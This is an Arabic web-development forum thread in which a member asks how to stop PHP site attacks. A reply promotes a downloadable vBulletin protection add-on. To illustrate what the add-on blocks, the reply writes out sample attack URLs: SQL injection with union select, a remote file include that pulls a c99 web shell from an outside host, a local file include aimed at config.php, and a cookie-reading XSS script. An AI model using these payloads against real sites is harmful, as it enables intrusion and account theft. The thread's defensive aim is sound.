بحث متقدم | التسجيل
الويب العربي
  تسجيل دخول
 
   
   

  ملاحظة
الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.




الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.

عـودة للخلف   الويب العربي سوق البرمجة والتصميم تبادل خبرات البرمجة

تبادل خبرات البرمجة تبادل الخبرات في جميع لغات البرمجة
Php , Asp , Ajax , Xml , Css , JavaScript ...etc

موضوع مغلق اضف موضوع جديد
 
خيارات الموضوع طريقة العرض
  #1  
قديم 11-01-2010, 11:04 AM
hasanrahal980 hasanrahal980 غير متصل
عضو
 
تاريخ التسجيل: May 2009
مشاركة: 13
مستوى تقييم العضوية: 0
hasanrahal980 is on a distinguished road
الافتراضي طريقة منع ثغرات php

السلام عليكم كيف يمكن منع ثغرات php لمنع اختراق الموقع






آخر تعديل بواسطة hasanrahal980 ، 11-01-2010 الساعة 11:08 AM. السبب: تغيير في الصورة
  #2  
قديم 18-01-2010, 03:47 AM
الصورة الشخصية لـ ourhome1
ourhome1 ourhome1 غير متصل
عضو
 
تاريخ التسجيل: May 2009
مشاركة: 277
مستوى تقييم العضوية: 15
ourhome1 is on a distinguished road
إرسال رسالة عبر MSN إلى ourhome1
الافتراضي

السلام عليكم اخي
لحماية المنتدى ومنع تطبيق انواع الثغرات وبشكل محدد تطبيق اكواد الثغرات من انواع SQL , RFI , LFI , Xss واكواد التحويل ومنع تلغيم المنتدى باكواد ثغرات في ملفات ال faq.php وال calendar.php وال showgroups.php

والمميز في الهاك انه به خاصية التبليغ على البريد مباشرة في حال حدث اي محاولة اختراق راح تصلك رساله وفيها ايبي الي حاول يخترق و استثمار الثغرة والتاريخ والوقت , لكي تحول دون وقوعها وهذا مثال من البريد بعد تجربة الهاك لمدة 3 شهور والحمد الله دو اي خلل بحمد الله .




اولا لا اسمح لاي شخص كان بانه يقوم بتغير الحقوق في البرمجة , ولا حتى حرف واحد
ثانية مثال على الهاك مباشرة .
أ . منع تطبيق ثغرات ال Remote SQL Injection ( ثغرات الحقن )
http://hackteach.org/cc/index.php?id...union%20sel ect
http://hackteach.org/cc/index.php?id=-1+union+select
http://hackteach.org/cc/index.php?id...nion/**/sel ect

ب . منع تطبيق ثغرات ال Remote File Include ( ثغرات الاحتواء والتضمين )
http://hackteach.org/cc/misc.php?do=page&template= {${include('ht tp://casavie.net/hack/c99.txt')}}{${exit()}

كود:
http://hackteach.org/cc/misc.php?do=page&template= {${include('http://casavie.net/hack/c99.txt')}}{${ exit()}}&

ج . منع تطبيق ثغرات ال Remote Local File Include ( ثغرات الاحتواء والتضمين الداخلي )
http://hackteach.org/cc/faq.php?faq=...des/config. php

د . منع ثغرات ال Cross Site $cripting ( ثغرات سحب كوكيز المدير و الاعضاء وسرقة عضوياتهم )
http://hackteach.org/cc/faq.php?faq=...;%3C/script %3E

كود:
http://hackteach.org/cc/faq.php?faq=<script>alert( document.cookie);</script>
منع اي كود تحويل كان وفي حال تواجد الاحصائيات والاهدائات واخر عشر مواضيع , تم حل مشكلتهم قطعيا قطعيا ,


الان نجي لخطوة تعديل ال البريد :

اول ما تحمل الهاك وتفك الضغط عنه , قوم بفتحه بالمفكرة او الدفتر او اي محرر php ,
قم بالبحث عن admin@h4ps.com , واستبدله بالبريد الي بتريد يوصلك عليه تبليغ محاولة الاختراق ,



هذا والله ولي التوفيق

روابط التحميل :
http://www.hackteach.net/download.ph...4cda663b9f. zip
http://up3.m5zn.com/7856599448.zip.htm






  #3  
قديم 09-04-2010, 02:09 PM
gn4mee.com gn4mee.com غير متصل
عضو
 
تاريخ التسجيل: Mar 2010
مشاركة: 55
مستوى تقييم العضوية: 15
gn4mee.com is on a distinguished road
الافتراضي

مشكور اخي جدااا





موضوع مغلق




قوانين المشاركة
لا يمكنك إضافة موضوع جديد
لا يمكنك الرد على المواضيع
لا يمكنك إضافة مرفقات
لا يمكنك تعديل مشاركاتك

كود vB متاح
كود [IMG] متاح
كود HTML مغلق
إنتقل إلى

مواضيع مشابهة
الموضوع الكاتب القسم مشاركة آخر مشاركة
هل يوجد ثغرات زحفيشن أمن المعلومات 4 23-08-2008 04:33 PM
http://www.5zn.cc (شبكة الإسلامية لحماية المواقع - فحص ثغرات - وسد ثغرات ) شبكة فاعل الخير أخبار المواقع 2 23-06-2008 07:19 AM
ثغرات باصدار php 4.4.6 / 4.4.5 / 5.2.1 راكان العصيمي أمن المعلومات 3 10-07-2007 04:12 PM
مهم طريقة حماية وإغلاق ثغرات منتداك النسخة (vb2/vb3) LeZr.Com أمن المعلومات 21 31-07-2006 05:06 AM
مهم طريقة حماية وإغلاق ثغرات منتداك النسخة (vb2/vb3) LeZr.Com طلبات البرمجة والتصميم والتطوير 3 26-11-2004 01:38 AM


جميع الأوقات بتوقيت مكة المكرمة. الساعة الآن » 11:45 PM.

Powered by vBulletin
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.


 
 »  خدمات البرمجة   »  رئيسية الدليل
  »  خدمات التصميم   »  الأمن والحماية
  »  الدعاية والتسويق
  »  الدعم والتطوير
  »  الشركات الرسمية
  »  حجز دومينات
  »  خدمات الإستضافة
 
 
  »  مكتبة الإستايلات   »  رئيسية المكتبة
  »  أكواد برمجية   »  أدوات الويب ماسترز
  »  مكتبة الهاكات   »  أدوات المصممين
  »  سكربتات متنوعة
  »  مجلات إلكترونية
  »  بلوكات متنوعة
  »  ثيمات مختلفة
 
 

صحيفة متخصصة في متابعة أخبار وجديد الإنترنت العربي
والحوارات الصحفية ومعلومات تقنية متنوعة .

   
 
 

للتواصل مع فريق عمل الويب العربي
يمكنك ذالك من خلال مركز الدعم والمساندة.

 الدعم الفني |  اعتماد العضويات |  قوانين الإنتساب |  إتفاقية الإستخدام |  أهداف الويب العربي |  دليل الشركات |  مكتبة الويب |  صحيفة الويب العربي |  الرئيسية